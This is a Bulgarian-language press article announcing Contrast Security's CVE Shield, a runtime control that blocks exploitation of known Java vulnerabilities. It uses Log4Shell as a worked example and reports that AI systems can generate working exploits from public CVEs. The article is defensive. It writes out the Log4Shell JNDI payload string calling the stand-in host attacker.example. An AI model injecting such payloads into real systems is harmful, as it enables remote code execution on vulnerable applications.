Contrast Security обяви Contrast CVE Shield, разработен да помогне на организациите да се защитят срещу нарастващия брой експлойти, генерирани с модерни AI модели като Claude Mythos.
Contrast CVE Shield работи в рамките на приложението, където открива, наблюдава и блокира опити за експлоатиране на известни уязвимости. Приложенията продължават да функционират нормално, докато екипите по сигурност получават видимост кои уязвимости присъстват, кои са обект на атака и кои опити за експлоатация са били предотвратени.
Използвайки изолирана среда (микропясъчник) по време на изпълнение за всяко поддържано CVE, CVE Shield е компенсиращ контрол, който предоставя на организациите незабавна защита, докато тестват и внедряват постоянна корекция за сигурност.
През април 2026 г. Anthropic докладва, че нейната изследователска система Claude Mythos Preview може да вземе публичен CVE идентификатор и съответния Git commit и автономно да създаде работещ експлоит евтино в рамките на един ден. В рамките на пет седмици OpenAI и Microsoft разкриха сходни системи за изследване на уязвимости.
„Организациите създават оперативни групи за борба с Mythos, тъй като традиционните цикли на обновяване не могат да вървят в крак с генерираните от изкуствен интелект експлойти“, каза Джеф Уилямс, основател на Contrast Security и създател на OWASP Top 10. „Създадохме CVE Shield, за да им осигурим незабавна защита и да спечелим време за екипите по сигурност между разкриването на CVE и внедряването на корекцията. Наследените приложения, зависимостите от външни доставчици и замразените прозорци за пускане на версии вече не трябва да означават пълна уязвимост.“
Създаден за експлоатация със скоростта на AI
Традиционното управление на CVE идентифицира онези 5% от CVE, които действително имат значение в производствена среда, и създава задача за отстраняване. Екипите все пак трябва да определят дали уязвимият код наистина се изпълнява, дали е достъпен, експлоатируем и свързан с чувствителен ресурс, и след това да защитят приложението, докато тестват и внедряват актуализация.
CVE Shield добавя защита в реално време (по време на изпълнение), докато екипите инсталират корекции за сигурност. Вместо да се опитва да разпознае всеки злонамерен код, той блокира възможностите, които даден експлоит трябва да използва, за да успее, като например изпълнение на native код, отдалечено зареждане на класове и произволен запис на файлове.
Тъй като CVE Shield контролира поведението, вместо да разчита на сигнатури на злонамерен код, новите вариации на поддържан експлоит се сблъскват със същата защитена граница. Не се изисква нова сигнатура.
Дори когато атакуващ достигне уязвим код с работещ експлоит, CVE Shield може да спре експлоита да завърши планираното си действие.
„Разработчиците и екипите по сигурност отдавна се борят с приоритизирането на CVE, тъй като традиционните инструменти се фокусират върху уязвимите версии, а не върху реалното изпълнение. Възможностите, които свързват идентификацията на CVE с достъпността по време на изпълнение и активната защита, представляват важна стъпка към по-практически приложима сигурност на приложенията“, продължи Кейти Нортън, старши мениджър проучвания в IDC.
Нека вземем Log4Shell за пример, тъй като това е най-известното CVE.
Log4Shell, проследявано като CVE-2021-44228, се експлоатира от атакуващ, който вмъква токен като ${jndi:ldap://attacker.example/x} в данните от заявката, които се записват от приложение или API. Това задейства изходящо търсене, което зарежда и изпълнява контролиран от атакуващия код.
CVE Shield обвива уязвимите методи на Log4j, така че нормалното логване продължава, докато възможностите, необходими на експлоита — изходящото JNDI търсене, отдалеченото зареждане на класове и изпълнението на процеси — биват отказани. Търсенето никога не достига сървъра на атакуващия и злонамереният клас никога не се зарежда.
Уязвимият компонент продължава да работи. Експлоитът — не.
CVE Shield се инсталира на работните натоварвания с една единствена команда и веднага започва да идентифицира и защитава срещу опити за CVE експлоатация. Той не изисква допълнителен хардуер, прокси или sidecar.
CVE Shield е проектиран за максимална производителност. Няма никакво влияние, освен ако дадено CVE не бъде експлоатирано, а предотвратяването на експлойт добавя само 12 наносекунди, което прави влиянието върху производителността почти неизмеримо. Може лесно да се инсталира на един хост или в голяма, разнородна инфраструктура.
След стартиране на приложението, CVE Shield описва библиотеките му и активира защити за уязвимите версии, които съвпадат с тях. Операторът Contrast Agent автоматизира внедряването в работни среди на Kubernetes и OpenShift без необходимост от промени в кода за всяка услуга или в Dockerfile.
CVE Shield също така заменя предположенията за уязвимост с доказателства в реално време. Той показва на екипите по сигурност кои уязвими библиотеки присъстват, кои уязвими пътища на кода се използват и кога се прави опит за експлоатация.
Екипите могат да насочат усилията си за коригиране към реалния риск за приложенията, вместо да третират всеки запис в списъка с чакащи задачи като еднакво спешен. Contrast предоставя динамични оценки на риска за CVE въз основа на архитектурния контекст, заплахите и бизнес контекста от производствените среди.
CVE Shield е част от Contrast Application Detection and Response. Първоначалното му внедряване носи локализирано изолиране на ниво CVE за 60 критични уязвимости на Java, включително Log4Shell, Spring4Shell и уязвимости за десериализация в Apache Commons Collections. Contrast ще разшири покритието.